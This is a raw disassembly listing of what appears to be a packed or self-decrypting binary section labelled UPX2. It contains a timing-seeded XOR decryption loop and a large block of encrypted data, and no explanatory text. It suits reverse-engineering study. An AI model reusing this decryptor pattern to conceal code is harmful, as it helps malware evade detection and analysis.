UPX2:3144A082j test dword ptr [ebp+3638A5h], 80000000h jz short loc_3144A0BE lea esi, [ebp+3638A9h] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FECh] mov edi, [ebp+363FF0h] mov ebx, [ebp+363FE8h] loc_3144A0BE: ; CODE XREF: UPX2:3144A09Ej pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3144A0C0 proc near ; CODE XREF: UPX2:3144A06Dp ; UPX2:3144A074p rdtsc retn sub_3144A0C0 endp ; --------------------------------------------------------------------------- db 0D1h ; =============== S U B R O U T I N E ======================================= sub_3144A0C4 proc near ; CODE XREF: UPX2:3144A08Dp mov dh, dl mov ecx, 27D2h loc_3144A0CB: ; CODE XREF: sub_3144A0C4+Cj xor [eax], dl inc eax add dl, dh loop loc_3144A0CB retn sub_3144A0C4 endp ; --------------------------------------------------------------------------- loc_3144A0D3: ; CODE XREF: UPX2:3144A092j push eax inc ecx jnb short near ptr loc_3144A08A+1 jmp far ptr 937Eh:17F33619h ; --------------------------------------------------------------------------- dw 0EEA5h ; --------------------------------------------------------------------------- sbb dh, [edi] xchg eax, ecx or dh, [edx-7CDAAB7Eh] sub [ebx], dl stosb cmp [eax-20h], ecx retf ; --------------------------------------------------------------------------- dd 0B47077FFh, 65EF7FB7h, 0F27BD47Eh, 0F7673B38h, 50C35C96h dd 23B7A07Fh, 0FDBA9F97h, 4CF55E0Ah, 722F6AE6h, 50F0D7A3h dd 0C4911DC4h, 0F90012A9h, 78740D25h, 0D29B30F1h, 0D3534932h dd 66E74866h, 0C263088Ah, 75A4DFEAh, 0D6845446h, 9C643EF9h dd 241CFBA0h, 534BB012h, 0F2BEA2DFh, 0D46BACh, 1280AFDEh dd 0E1A59650h, 0BC7E7203h, 1D0D0FC4h, 0E84640BDh, 93EF49B7h dd 0E915AF76h, 481B8BBAh, 2C1838Ah, 0C7965636h, 0AA2825E9h dd 0B8E54D35h, 8186E440h, 0C5F7E0BAh, 6F8E296h, 0B283A85Eh dd 43FBFE1h, 0D532082Ch, 9C47B723h, 5D8CB86Bh, 0B4FC42AEh dd 90154344h, 0C1ED78A2h, 939CFDC5h, 87F523B3h, 71A1DC82h dd 0D268A1D3h, 0F909580Dh, 0C1F0295Bh, 1040C611h, 0CA78A7E0h dd 0BBA993BFh, 74832F5Eh, 157266DEh, 0DC4EE0E6h, 9DFAE9FBh dd 0B3A5B66Fh, 0A854B589h, 5F8D3743h, 2015383Ah, 0C71B11C3h dd 0DD4422C2h, 79A8D48Ah, 2379E415h, 0C03069B5h, 0C17BBC3Ah dd 89B8E7C2h, 0A7E86CD1h, 79836CDEh, 5D84A3E2h, 0A29E72AFh dd 0D4643B5Ch, 4B507FDEh, 0B3013CF2h, 2CD8310Dh, 39844BAh dd 0A6608FBCh, 65A4668Fh, 56631770h, 0FD205833h, 419D1ECEh dd 8B4D502h, 0FFEA76C3h, 0F299989Ah, 716C2C3Ch, 9DAE0FA9h dd 5451F755h, 2B57423Fh, 0EA3B4CEEh, 0B5838ACEh, 0BE040088h dd 2C5C88D2h, 273530FEh, 36E42579h, 39AD7742h, 3FF31FC5h dd 0EB27DF0Eh, 0ADF54952h, 89386396h, 4C7CABB2h, 0C755101Eh dd 50040559h, 9BCC7866h, 378CBBE8h, 0A1B8AF2Eh, 8F144772h dd 25B046B6h, 3D9DA1ADh, 0B0E00E56h, 0A3B1AC82h, 5168A1FDh dd 7DADDB00h, 0FAA68AB1h, 0DC63A4h, 0A078A7D6h, 8DBCE94Bh dd 32592F34h, 0EA4E19A8h, 6FB37D73h, 5E3D102Ah, 0DA6682EDh dd 2A548384h, 699AF372h, 0ADDAE33Ah, 0A56E4F7Eh, 3528DF86h dd 423A42F9h, 8611B7Ch, 1064844h, 0F8F96AE1h, 898EDCC8h dd 256F25EBh, 11406DEAh, 69960E61h, 96C8F710h, 0DD0E3BEEh dd 0C3D5F4AEh, 9A94F5C9h, 2C570646h, 0ED2A7C86h, 0A9A0A35h dd 55BD334h, 0F06D9847h, 762C6DB2h, 774B794Bh, 84C41C12h dd 0F1A8A2D9h, 80B76BACh, 51B69434h, 0E43BE9C1h, 848DB867h dd 964C4D92h, 57AB4D63h, 5ADDE032h, 6C974607h, 2D6AB3D0h dd 71A17716h, 0DD599E42h, 722861BAh, 0CB6CF105h, 85C020D7h dd 0AFF7C2D1h, 5EC164D6h, 5516ABB0h, 84175A93h, 0CCBD3354h dd 944877A6h, 0A272F6EEh, 0AB600D1h, 0E55947FFh, 4F5887B6h dd 69DB4651h, 3C043D95h, 0C31F4717h, 0B00E3BC6h, 0FE07BD08h dd 34121D8Ch, 55EB719h, 4908AEBEh, 0E770601Ah, 0BBC4A45Eh dd 15441BA2h, 19E2BFE6h, 93A6A97Bh, 0F85C03Eh, 7D54B589h dd 1D80375h, 0ADDC7B33h, 0F14A9BF5h, 750E5F49h, 7BC2D76Ch dd 0D5EC7118h, 1302F87h, 2F25A3B8h, 1C47B7E9h, 0CDCA10ACh dd 0EEC536C1h, 548337EDh, 2C45F726h, 0DD3A2B6Ah, 215C7C17h dd 967B48F2h, 0A9358693h, 601C7D6Ah, 774B83Bh, 25442C02h dd 0D3C87D12h, 3B9A475h, 0C470A9F5h, 0B1C1BCD2h, 0C9F969BEh dd 0D2D839Ah, 34D3AFDEh, 0E0A69666h, 0B07A6701h, 782012DCh dd 3690DA89h, 0A5D14CDAh, 85ADB876h, 0D25CBD85h, 479B4D6Bh dd 201B4442h, 0F91E6CC0h, 3F069BA0h, 0BAC64AF1h, 0ED4D2364h dd 9E386797h, 41F54AF1h, 6E97BB3Ah, 0E33F89F7h, 9ABE44A6h dd 6BB0ED4Fh, 0F684FF2Eh, 0DEAAD68Dh, 0E9DD8780h, 0EEDAAD8Eh dd 5F920BC0h, 0FD00277Dh, 130297ACh, 461A4EF5h, 1751F78h dd 0EDA7BFE6h, 4978A251h, 6E2D2229h, 87851664h, 6044459Eh dd 7DF436D4h, 0EFBF980Eh, 60384B1Dh, 255A1E73h, 39CC97F6h dd 0FD8C5A6Ch, 9FB5B02Dh, 0B064A5F9h, 76DC8EC6h, 0B5C86FB5h dd 3D66DA01h, 809CA3E4h, 0DA4718EBh, 0F6BABEA5h, 9FAB6FA8h dd 54AC7763h, 669FF726h, 0EB377DFFh, 67C580AEh, 8C94F5C9h dd 5627FC5Eh, 0ED76117Ah, 310A8FD4h, 74CCD368h, 32E81346h dd 0AD2C314Eh, 85FB93A4h, 0FDE201EDh, 0C9F81309h, 0D7D4A2A9h dd 0DC7F5021h, 0A3D1B5B7h, 88596566h, 57D984FAh, 0E29089D5h dd 351723F6h, 0E9401F2Eh, 2D5CBBB3h, 71A0C196h, 0B5E41343h dd 0F9285786h, 3D6C9BCAh, 81B0F7ABh, 0C5F42352h, 0F66B31C7h dd 7B47F94Fh, 3D99441Eh, 2E71F3E6h, 948B9944h, 6B95CA7Fh dd 342FAD2Eh, 0E52278D8h, 1634023Fh, 7B74CBCCh, 0FDE00F3Eh dd 804F3CEDh, 501AC7B6h, 18C0B27Ch, 0A0A67A29h, 445116FEh dd 0DC87F7D6h, 8D8AD048h, 0EE70AAD7h, 49877394h, 3CFBD6A4h dd 0F8A19A64h, 8B72700Ah, 5620E0D7h, 3AEC91AAh, 0ADA8685Fh dd 83543C12h, 350AF6AEh, 18CDA545h, 0D4AA7E3Eh, 1713AE2h dd 2411D191h, 0E0FE8262h, 0ACB14E36h, 7F291FEEh, 1684F285h dd 0EDA99254h, 0B27E6B0Fh, 52231ACDh, 17D7C3B3h, 0CCAC6653h dd 82712E28h, 5934EACAh, 11C5B670h, 0DC9A5446h, 0A9492FEBh dd 2015EDA6h, 0F7F7E376h, 0AC8C4633h, 615304CEh, 21ECCAB6h dd 0FB97C111h, 0B17B4707h, 584C0FC5h, 35E4D696h, 0C4B1715Ah dd 805E4712h, 4408EED6h, 1EF4AA93h, 0C1976A11h, 907C3AE3h dd 7B6CFEA7h, 0CDD5BA7Ch, 0A486413Bh, 4E381EE4h, 243ADFBFh dd 0E5818A72h, 0B76D4116h, 6A2D03D3h, 38CBBBABh, 0CDB9B95Ah dd 9F7D1017h, 4C1F87D3h, 1F58D8Eh, 0DC895B5Bh, 906353E7h dd 5D07DAB2h, 35C9B77Fh, 0AD94712Fh, 423422F7h, 2C2CD3B3h dd 0E4FA9B77h, 0B04E4A32h, 150516CFh, 0DFCD2A1h, 0CDBC964Fh dd 0A0784B0Fh, 5131C4B2h, 1AEAA2A0h, 0ADB26453h, 0A7542A39h dd 5C17E1A7h, 1EDB969h, 0D8AB1B0Bh, 6D5F09FAh, 0C11CEA7h dd 0FBD78178h, 0A4884A37h, 110101F1h, 31E5DCAEh, 0EBAA9E6Ah dd 9C75490Bh, 513132AEh, 12F1AAA4h, 0C09E6179h, 0A21C2E16h dd 770EEACEh, 38C1BF6Bh, 0D0986727h, 0FD6D3CE4h, 2F15EF81h dd 0E6DB9142h, 0C98B5433h, 6E5319CAh, 62F3DCBBh, 0E7ADB510h dd 89084315h, 782F14D8h, 53A3CC9Dh, 0D1AC667Ch, 9D7D1476h dd 4830E2FCh, 3D4BBBFh, 0C191712Bh, 0F96924E3h, 7B18FE99h dd 0D5D5B367h, 0C5914E3Bh, 6C5D0BC5h, 342FABAAh, 0FCA59B6Dh dd 0B0695A36h, 700E18F2h, 34D8DE86h, 0F4D09A43h, 95752E1Ch dd 5E3DEEE0h, 4DAADB5h, 0E7E06A52h, 805021EBh, 5529FBA7h dd 7DCFB466h, 0B5996D19h, 695D25F7h, 3D36A7B3h, 0F8D68F5Bh dd 0A3505B2Dh, 792D05CBh, 2AEDD083h, 0F8A7947Eh, 955E3F00h dd 4431F1F1h, 0DEA282h, 0E3DC6E56h, 94520C0Ah, 6501E7A3h dd 1CCBB874h, 0F3EC6839h, 64421CFAh, 1511D7B3h, 0ECDB8864h dd 0B5B95829h, 5234219Eh, 21E5D690h, 0FAADA443h, 0B363521Eh dd 622431AEh, 11F5A680h, 0CCAB5253h, 826E1B08h, 4213EADDh dd 38D09D02h, 0D0BE6727h, 9B632CEFh, 3513FA9Dh, 85DA8C7Bh dd 0B9B75318h, 647A05FFh, 1F80CAB2h, 0F0B4BC56h, 0B67A6708h dd 6E3F1EC9h, 4FBD0BAh, 0D19A035Ch, 877D3739h, 593FEEE9h dd 71CEA097h, 0C7B4670Ch, 9A4D23E9h, 4F05CDBEh, 0EDD1AA7Ah dd 0AA99461Fh, 47381EE4h, 2809FAAEh, 0FF89966Ch, 0B8765C04h dd 762103C7h, 36E3EF84h, 0EFD0914Bh, 8C661406h, 400EE2C2h dd 0CE9BF88h, 0DC854252h, 0F55D21EDh, 6C04E394h, 12CFB264h dd 0B5A37A2Ah, 625A0AE0h, 2739C882h, 0F9EF8269h, 0B66E462Ch dd 541724A2h, 2BE9C3B5h, 9DBC8E5Eh, 927F530Dh, 463BF0D7h dd 69ECA29Dh, 0C3B26459h dd 0F1542C1Bh, 5D10F6A5h, 1BDCA469h, 0D08D7533h, 64425FEBh dd 3674D5B1h, 89DC8973h, 0A69F4429h, 58401BFBh, 27E1C78Ch dd 0DABC9248h, 0B87F5406h, 453E1EE6h, 2C94A69Eh, 0DBBD7358h dd 0AA682E14h, 5E23FBDBh, 16C1BD6Ch, 0EA8C7232h, 98583AFEh dd 351ED6CEh, 0E0DA9177h, 0AC886822h, 443C2AF4h, 23E5DBB0h dd 0DAB0964Ch, 8C665216h, 1D0D17D8h, 4E4D1A7h, 0D1B16D40h dd 8D792224h, 4830E2FCh, 27E48EFEh, 86AD4303h, 0B56C79B4h dd 583E9B86h, 0EEDC9C69h, 0A0BF4621h, 6C6A67EFh, 280CE4BDh dd 0E8A5A470h, 0D5454B27h, 482F12F4h, 24FEDE9Fh, 0D4BC9E78h dd 0A46C0617h, 4E3DD5B6h, 3BE8AEA9h, 0D495635Fh, 0F5652BC7h dd 539EA490h, 0F6FA8D08h, 93F1759Ah, 532C116Dh, 76083229h dd 4937EB2Ch, 81567908h, 0D348CF4h, 62562219h, 594FFB1Ch dd 0E9D2617Eh, 0DE1D0EB2h, 1C90FDDh, 45DC0B3Ah, 0F20403F3h dd 300E93A8h, 13FB8757h, 0ED20904Fh, 55608B05h, 1725E3B8h dd 8F2D1845h, 4EFC1D66h, 84BF635Ah, 55B28FECh, 5AC033A5h dd 0E618AEE7h, 0E8637F98h, 0DC6C398h, 0A9EA0706h, 0BC4D8FF1h dd 6030CFD4h, 0B527CB68h, 0B782434Eh, 0FFB9A4DAh, 0C270A9F2h dd 5787C3D6h, 50F7E7D3h, 55E69C58h, 6436DFDh, 542C0C11h dd 0D6F7C899h, 1D4CDE2Eh, 68F8EFEEh, 2ED40342h, 62182DA2h dd 451CE176h, 71B0CFFEh, 0DFB61128h, 89213F86h, 3D069BCAh dd 7EE08C5Fh, 0F3CFD5C7h, 0F6613896h, 7B47ED4Fh, 0E53F6A1Eh dd 0A989B813h, 0FA4841B3h, 5D1936E6h, 0A2D0C93Eh, 1A4714A3h dd 0CBDD0C64h, 0E09CFDC1h, 0B1C7F4B1h, 0A0FBB82h, 0BCE36839h dd 7D9AE0F0h, 0E9B890C3h, 1FDC6392h, 0C2875829h, 0BB870D9Fh dd 9E8FA25Eh, 0FD44738Ah, 0A67748EFh, 0A6267EA1h, 21953F58h dd 0AAD9A3C6h, 6998EFAAh, 5222FFD2h, 3A5C481h, 0B064A5F9h dd 0F4A3A3C6h, 0BDC472C5h, 0FFEFB78Eh, 82FF5C2Dh, 61ED2449h dd 0CDFC2B5Ah, 1ADEEC3h, 668485F9h, 44D7AEFh, 8C0C0D74h dd 71012EFAh, 0F06B92A3h, 0A9EE3C44h, 12384FFDh, 75BC92Bh dd 71668E02h, 0B9004246h, 0A02C5B8Ah, 5A4F724Fh, 7ADEE324h dd 0D2F2B2DBh, 5F6C6BACh, 51A48F13h, 5147F308h, 5CCF516Ah dd 1D7A60FAh, 0E4579F23h, 0A5E21860h, 0E9324752h, 373648E7h dd 71A927A6h, 0F7691342h, 30D6FDE7h, 54AF6BBFh, 0B78CBF9Bh dd 0CD702652h, 9CB1259Eh, 4D4A97BAh, 0C4030DE9h, 0D504338Ah dd 0F4C92AA6h, 5DBAA073h, 9DB462A5h, 99974344h, 26588F92h dd 6D9C727Eh, 0B90C8E3Eh, 0A1245380h, 396993AEh, 0E739240Ah dd 4AF02975h, 21B0EE6Eh, 4978A6D2h, 65BC814Ah, 0D1002F5Ah dd 151621F4h, 0CF1D48B1h, 0AECCCD11h, 0E587B2A7h, 745483B3h dd 389AADA7h, 0ADB40A50h, 0A3604F7Eh, 0E06063Dh, 0FC3ED730h dd 0EDB76FBCh, 3437DAh, 0BA23A3D2h, 8B98C3A2h, 58032B5Ah dd 117653DCh, 214436BBh, 0C9DC1430h, 0DD66EFE1h, 77072EFCh dd 5E4E560Dh, 2C810700h, 0BBCC3EBAh, 0A261A41h, 2229D334h dd 0D3BF4502h, 6AA103CEh, 41709ECAh, 0EF74D0B9h, 620B7E46h dd 5D6C3BCAh, 3D0FF8Eh, 0AEAE66DDh, 1D893750h, 1D4C79A2h dd 69B4CB11h, 99E696CDh, 164B4740h, 1B60B92Fh, 756292FEh dd 0BFDA9342h, 726E56F3h, 0B79E347h, 0CA93C0Eh, 0F3E423C7h dd 5FE96496h, 8DF87925h, 90DF6711h, 510B3362h, 194876B6h dd 28B6856Ah, 9F50B93Eh, 0E4904C72h, 0A95887B7h, 9CE9EBC4h dd 0E1DE8E78h, 80631DCBh, 0FFA71C84h, 56E3DA4Ch, 0C19A4E80h dd 0FA6735C3h, 7F448D43h, 4C87B21Ah, 0D1DFAA51h, 90C973A2h dd 59BEA977h, 91A4FB40h, 0B1103F6Eh, 0FC17CE1h, 5498F1CAh dd 0ADDC0B36h, 0F19FCA71h, 848D93C2h, 0F8A8D706h, 0F4BE4B74h dd 0A4B550D8h, 0C674A3D2h, 0B514EFD0h, 54782457h, 2D406F9Eh dd 0F977C6C2h, 1CC7CD1Ah, 0DD0C3BE6h, 1707203h, 44A9E3D2h dd 0DCAC6251h, 0CD20E705h, 4FE1F3CBh, 1CCF3FDh, 38996232h dd 0C75C58F4h, 2905B0E1h, 854BA4D4h, 0D9421659h, 0FA3C6BBDh dd 0C47FFD3Ch, 95F2C8E8h, 8958F755h, 14A42BFAh, 2590BFEEh dd 0C9BA745Dh, 0E97C2619h, 11661E45h, 0B125CFC8h, 7CD72536h dd 0C54CD20Fh, 553D9BFCh, 1B0DD0Eh, 95A27203h, 3506F269h dd 0D8F1ABECh, 91F6F48Dh, 81CD0032h, 481A27F7h, 2F1944BBh dd 26D0C915h, 70EB6776h, 296EBCF0h, 0E01C0802h, 0B1D61A55h dd 9FE7AA83h, 0C669FDC7h, 79DF2439h, 7C700AB1h, 502239Ah dd 0CC26D3D7h, 0BEE69FDAh, 62D0A485h, 291470A9h, 443F026Bh dd 2747FB1Ch, 0E1103E62h, 245C0939h, 919BC7F6h, 26BCC011h dd 9086BCB5h, 0D72396B6h, 0FA863CF3h, 36BF148Dh, 0D5BB0842h dd 51EF782h, 76D2B547h, 0F1FABEA5h, 9CCB6FA8h, 55B28898h dd 0B2C433A5h, 0DAE5B8A5h, 213A7869h, 2A1DC31Ah, 0E68BC435h dd 0AC4B1F3Ch, 7C3CCAECh, 1AD6B06Bh, 0CD8E7835h, 93450CD6h dd 3207F0AAh, 0F7C1A04Eh, 0BD964224h, 7E4E0ECCh, 0DEEC0B7h dd 0F9B48B67h, 0AB6D4509h, 6F2D2FAAh, 29E4DA89h, 0A5A0705Dh dd 0B9184774h, 2D5C8BBAh, 15C3BD97h, 0D08D696Ch, 955879E0h dd 7E25D5CAh, 0F1DBFF45h, 0AA8E5B35h, 5C320CF9h, 6D2EEE89h dd 0D88FA57Ch, 0A322132Ch, 6C3C05CFh, 5D64EEE0h, 0FCD0FF2Eh dd 0FBB7AEF3h, 0AC9E8780h, 6DAADE91h, 2F75F03Eh, 342465B9h dd 51C882Eh, 0C827C560h, 0C1C62418h, 2B08CFCBh, 0C81E8DA3h dd 0F8A11424h, 8BBDA27Dh, 9E44459Eh, 0FCDFB590h, 18415E4Ch dd 0E12608BFh, 12A3063Dh, 0E062C7C0h, 0E350F17Ch, 0F091B480h dd 548F5C20h, 8653C8EEh, 999098B5h, 54455B86h, 57C2614h dd 61B8E720h, 0CDFC2B52h, 3F0329CDh, 55C8FFA6h, 0A26262D9h dd 1D073B5Ch, 4BC368DAh, 0F06B90F0h, 0A9EE3C64h, 0E5688BFFh dd 71680A40h, 0A55BD334h, 476CFFD5h, 0F6C4A475h, 12709FCEh dd 0CAEBA054h, 85BC0905h, 98C36BD6h, 51B69474h, 6A3A9ACAh dd 2CE6DF99h, 90B38455h, 61A6AD3Fh, 2059CA01h, 0E92E0772h dd 7C0DDAEBh, 20F19EAEh, 8E4286BDh, 0F2C057B0h, 686C9BCAh dd 0B2E29A5Dh, 89B00D60h, 9CC767DAh, 4D4A9070h, 91C0E5F6h dd 0A5774462h, 6D261ED4h, 0D8CFA8Ch, 9A826AD1h, 609D4344h dd 296EBCECh, 0E011FAF5h, 0B1D6164Fh, 0C944D60Bh, 0C63997F0h dd 4B97719Fh, 0C5988C4Eh, 88346392h, 7F61D963h, 3031B21Ah dd 0D1361318h, 0EAB1DC4Ah, 0DC4FD119h, 9DFAE540h, 44936F6Eh dd 25629DDEh, 430D4AF6h, 0FDDC3D24h, 9B21252Ah, 370CC1C2h dd 8628D706h, 8BD051DFh, 5BF0DA8Eh, 0C8F981A7h, 898EF94Bh dd 40FA4108h, 275E052Bh, 5D2E7E2h, 669AA676h, 0EB3075FFh dd 0B4AF27AEh, 65A2FFB4h, 97BF82F0h, 51C4B4Ch, 31608FB2h dd 36EB8055h, 97DA240Dh, 0FD6017CEh, 7ADA0A31h, 0ED27E324h dd 0C9F82751h, 15E9DE17h, 0DCD9AFE8h, 0A3F8E59Fh, 2C22DF66h dd 11A48455h, 3690BFEEh, 0EB9D4D7Bh, 0AD361333h, 0D25CC7F6h dd 479B656Bh, 0BA249642h, 0F92A6202h, 380408CAh, 0CB0DF0Eh dd 0F3ED30E7h, 0B4B53E96h, 4D4A97E8h, 6E341CF6h, 0E3B9B09Dh dd 1948419Ah, 5F9C3FE5h, 4D51FF2Eh, 0E51442E2h, 2859EFE2h dd 0F863CBFAh, 0B1D63328h, 0F4B49703h, 0B23897C6h, 2FACB1DEh dd 0FDC68AB1h, 0C5B163A4h, 2175D28Fh, 8DBCF892h, 0EACABAA1h dd 0F7AF7394h, 47E40A65h, 0E8CCFB1Ch, 9195B247h, 7554B5ACh dd 55BA5209h, 6D590B0Ch dd 0F0A9CB71h, 75EF93C2h, 86A85C0Ah, 0D169947Ah, 0C7306990h dd 734AC457h, 89D2E616h, 0CF962A30h, 2D6EFA61h, 0AD07B3D4h dd 0F94CF8D9h, 4E0C3B6Bh, 3F38EA23h, 75FEC3C4h, 3C275464h dd 0ED2A7764h, 0B46F4F3Bh, 75A4D242h, 0A76AAACBh, 0F59D5BBCh dd 0BE8AB626h, 85208BEDh, 0E2A62756h, 2908E27Ch, 0F315508Ah dd 18C4C519h, 0EF16A7DBh, 0F54DCAAAh, 9E6F45E4h, 0BBA996BFh dd 0E9724740h, 2D5C9FD2h, 8EF39DFEh, 83D839D7h, 0DD6CDA86h dd 39F916DEh, 0D1B0E94Eh, 4EFE955Dh, 0C82C43D2h, 77EA33Ah dd 938AFD1Fh, 0DE077970h, 994053E2h, 0BD4DB40Bh, 0E5DBAE26h dd 0D7EB5356h, 41E50AE6h, 859CFDC6h, 0B1E00F22h, 8D127DA7h dd 1748B9E6h, 5889E12Ah, 0B9C8316Bh, 20141BB7h, 632ADA5h dd 8D9CA553h, 8B95D009h, 94444599h, 59881B22h, 0CDCC912Ah dd 74EF6C39h, 2562BF98h, 7C1C4A7Dh, 0ADB60B0Ch, 384B549Dh dd 308CC2CFh, 5FA8D706h, 0BDE67F6Fh, 5BA5A0D9h, 0C67495E9h dd 62E8EBD2h, 0CDFB4351h, 0ACCD6F9Eh, 55B2AD74h, 0C37A471h dd 0DD3A0740h, 752EBF2Bh, 59FC767Fh, 0C5B0700h, 0ED2A5EFEh dd 56ED02BEh, 5EA4E53Ch, 0E8E87D88h, 68D308DCh, 4146A3E8h dd 0FBB41B91h, 3773B679h, 3154DE17h, 5C30AFE8h, 85B15DD0h dd 231FDF06h, 6F2D8455h, 0EC995CF9h, 4F3F0245h, 273388FDh dd 11343637h, 0D553CFC8h, 0C0FE4C5h, 0E3BDA8D5h, 0BD6CADF6h dd 0B7A5B4B3h, 0EF802252h, 94D57FEh, 87E954DAh, 11C0D925h dd 0E33A54DFh, 83C77A6h, 43E03E2Dh, 0A1D0FF18h, 60D24372h dd 296EB9D1h, 939422FAh, 3427F0C1h, 0F51246F6h, 0B96897C6h dd 7DA81957h, 0E1BF1543h, 6B5B0CFCh, 691EC8F6h, 0E8DA8276h dd 0F14F0F7Fh, 70291AD6h, 79E7C3C6h, 0F8A09E49h, 95714D0Ch dd 2F59A2D7h, 49B8E7D6h, 0DEFC441Ah, 944D220Bh, 5403B3B0h dd 17CDB374h, 0EFE6166Bh, 6F5533EBh, 3611CFA6h, 0A9C18B65h dd 0BD8C4A32h, 7F214FE7h, 2DE19386h, 0EDAB9256h, 0F178550Bh dd 40240C8Eh, 0BFDA79Ch, 84F83D51h, 8C4B4177h, 5808ECCAh dd 1484B46Ch, 0DDC87B2Ah, 9C0C22EBh, 2F50FBA0h, 0F1DC847Bh dd 0A69E077Ah, 7F5A4BE8h, 35EECAB7h, 0B58DD351h, 0AD615611h dd 4A467690h, 4E2DA86h, 0C0A66212h, 9C773E56h, 5F3AAB96h dd 15CEAA97h, 0F6C42C31h, 0D84D3AE9h, 1D18D2EAh, 0F590AC67h dd 0E4914E3Bh, 2E4C2EB6h, 2C108BA9h, 95E18A6Ah, 0D634F4E6h dd 9607A3DCh, 0F54BD372h, 889C5D8Fh, 4A04E566h, 2938E9C9h dd 31545436h, 0E32263F2h, 25FCEB31h, 19D1B5A2h, 7DB2B849h dd 0C1F01F4Eh, 5346392h, 4978A7D6h, 8DBCEB1Ah, 0D1002F5Eh dd 154473A2h, 5988B7E6h, 9DCCFB2Ah, 0E1103F6Eh, 255483B2h dd 6998C7F6h, 0ADDC0B3Ah, 0F1204F7Eh, 356493C2h, 79A8D706h dd 0BDEC1B4Ah, 1305F8Eh, 4574A3D2h, 89B8E716h, 0CDFC2B5Ah dd 71406F9Eh, 6A501661h, 1AC8F710h, 0EB33E3CFh, 965F7FAEh dd 3619D7B1h, 0E26F082Eh, 66CC487Ch, 1A44ABFAh, 6CD6DF40h dd 0CAE0557Dh, 0E96ED09Eh, 0C87CDDE5h, 0B38B3787h, 117DAE56h dd 0E63C5DA5h, 79422CDBh, 57A52AC0h, 5C803762h, 1D7A5FCCh dd 6190DB06h, 0A5F46B32h, 6C954776h, 2D6AA829h, 5B8F6A7h dd 0B124904Eh, 7CD7A064h, 3D5AA47Eh, 826928CDh, 0F3D045DFh dd 0F6288496h, 4DF357AAh, 73C4079Dh, 4699BA94h, 9A484185h dd 58F8BBD0h, 0D3D3CD05h, 195ACE62h, 0AA06DCEEh, 69E8CBC0h dd 0B20B3DC1h, 1D34217Dh, 0C6976891h, 0F0871521h, 0C1C62096h dd 317F60CAh, 0F1FD2815h, 4ABCDD25h, 0E73F9BDBh, 154473A2h dd 59B45FE6h, 1847FB2Ah, 0E12600DAh, 0DAA2155Ah, 69802F09h dd 105F0B3Ah, 0F11670CAh, 0BC6CE6C2h, 4F8CD89Bh, 4270F04Ah dd 370FEB03h, 0C0FB60D2h, 898ED8AEh, 0F248BED3h, 12A86FA8h dd 6684B3E2h, 0A4334EFh, 0DD0C3BEAh, 0DFBD97FCh, 0F0973C0Dh dd 0A9EE38EEh, 979F9D79h, 0B56F8FB2h, 75A4D205h, 0B9F86DC5h dd 0FDD1DF85h, 3FB9FCEh, 4D5CB31Eh, 0CA07D8A8h, 3B03B31Fh dd 146ACDEh, 6C44FBA8h, 59114366h, 1E385553h, 0EA6154AEh dd 4455027Ah, 36C798A9h, 6118723Bh, 9DD5CFB2h, 362C381Bh dd 7627AD7Fh, 3D6C9B7Dh, 7FC85E68h, 40FB1161h, 938673Dh dd 4D46288Ch, 0DB4BEA6Bh, 5E06D872h, 48B974ACh, 0A272C902h dd 7965FCD1h, 4814754Dh, 0D2204733h, 6D184FF5h, 41F0F3Eh dd 0F5126C5Ah, 0C73D7F96h, 0F8AF24F5h, 0C1C62096h, 3AECE61Dh dd 4D7BA7E0h, 4D3FB83Eh, 0DEDB1C5Ch, 7A77B14h, 0AA87E66h dd 99E8DFEBh, 0C8342347h, 650FA7BEh, 92192E1Dh, 7067DC35h dd 0AA1710Ah, 0EE0AD66Ah, 8229E172h, 424D2013h, 0FAB171FAh dd 0E9C18104h, 7239C162h, 3EA4C2C9h, 0EAC171EAh, 0A6DC5A9Fh dd 6249E152h, 3C29042Ch, 0DAD171DAh, 84B1FCC2h, 3C270142h dd 0ED2A74C2h, 0CE1166E5h, 0F6FA2CFDh, 56010384h, 3ED3A474h dd 1974F5CEh, 7A41D5FAh, 896DAFA9h, 6B3C5DBCh, 53989E66h dd 962033C0h, 726ED564h, 0F5147DC0h, 9E6F4AF5h, 22DCC1B1h dd 0B11D2DA7h, 0D2A98552h, 725A4F01h, 0E5541831h, 0DF68D284h dd 0D6C69BFCh, 0D9D8B529h, 0C60EA3F8h, 18887FE3h, 0B2884532h dd 91C157E1h, 7803362h, 0F9997AD2h, 0AB677114h, 0A168FAC5h dd 4E944372h, 0A49B3854h, 5BA47B6Fh, 4637243Eh, 70D39058h dd 395EAF63h, 75ACDB0Ah, 308A41h, 80C26872h, 494E9F75h dd 0EBBA9E1Bh, 3A25A653h, 0B6C185B1h, 5B8881DEh, 90AAFD5Fh dd 0E5FB1A5Fh, 558ED4h, 0D5706C90h, 2623F4C5h, 64A97B3Dh dd 3552AC0Eh, 0FC5F14ADh, 0BDDA23EFh, 9305F8Eh, 41B436DDh dd 15504DAAh, 4403D4A5h, 277FBF0Bh, 0F60145E2h, 98C8C11Eh dd 0EC033F1Fh, 0E17B7D45h, 0E0630059h, 0A9EE3F93h, 0E51C4B7Ah dd 0B4EAA8CAh, 7592EB9Dh, 0DFE3F787h, 9B69D087h, 0EB882F65h dd 0BD2B6698h, 29392760h, 695B6E81h, 622BA957h, 7E6F95E2h dd 566C8F74h, 97E77BAFh, 57A8206Bh, 648C0732h, 2AB35F96h dd 0DB7770Ah, 714B7798h, 0AC0FB824h, 117053ECh, 0C2936835h dd 4062DB83h, 0C0922BB2h, 0A25EA71Fh, 0DDCCA831h, 0C9C285B4h dd 2AF7D58Ah, 6D9AF359h, 584D1D8h, 5E2325C6h, 97DEBD8Dh dd 0D79DF375h, 9355BF30h, 4F3B7BF4h, 0B282748h, 0C764E30Ch dd 0CDA0AFC0h, 713DF4B7h, 0B5FD886Fh, 0F9BD4C23h, 4E7D00E2h dd 0E9B092D3h, 90B37394h, 59BE8F43h, 1DCCFB2Ah, 81A03C1Ah dd 80D17418h, 6998F1CEh, 0D9D40B3Ah, 7A75F779h, 7ACF932Eh dd 410D52F1h, 0BDEF1B7Ch, 853F5E8Eh, 4574A305h, 22120FA6h dd 0F24096D3h, 0F9F06FA8h, 0E80D1848h, 99FEC8E6h, 0E5A9BE9Dh dd 21537F98h, 70E0C3F2h, 917D82C1h, 0ED1C4B4Ch, 34148EBEh dd 8A5A12EAh, 1301A7B9h, 41A9D021h, 0CA70A9F1h, 0C7CC8DDh dd 0FFC7E3EBh, 0F174E29Ah, 0AEE4C866h, 55F75814h, 5CFF9C00h dd 1D7A430Fh, 6190BFEDh, 20220D46h, 0E92E7FD5h, 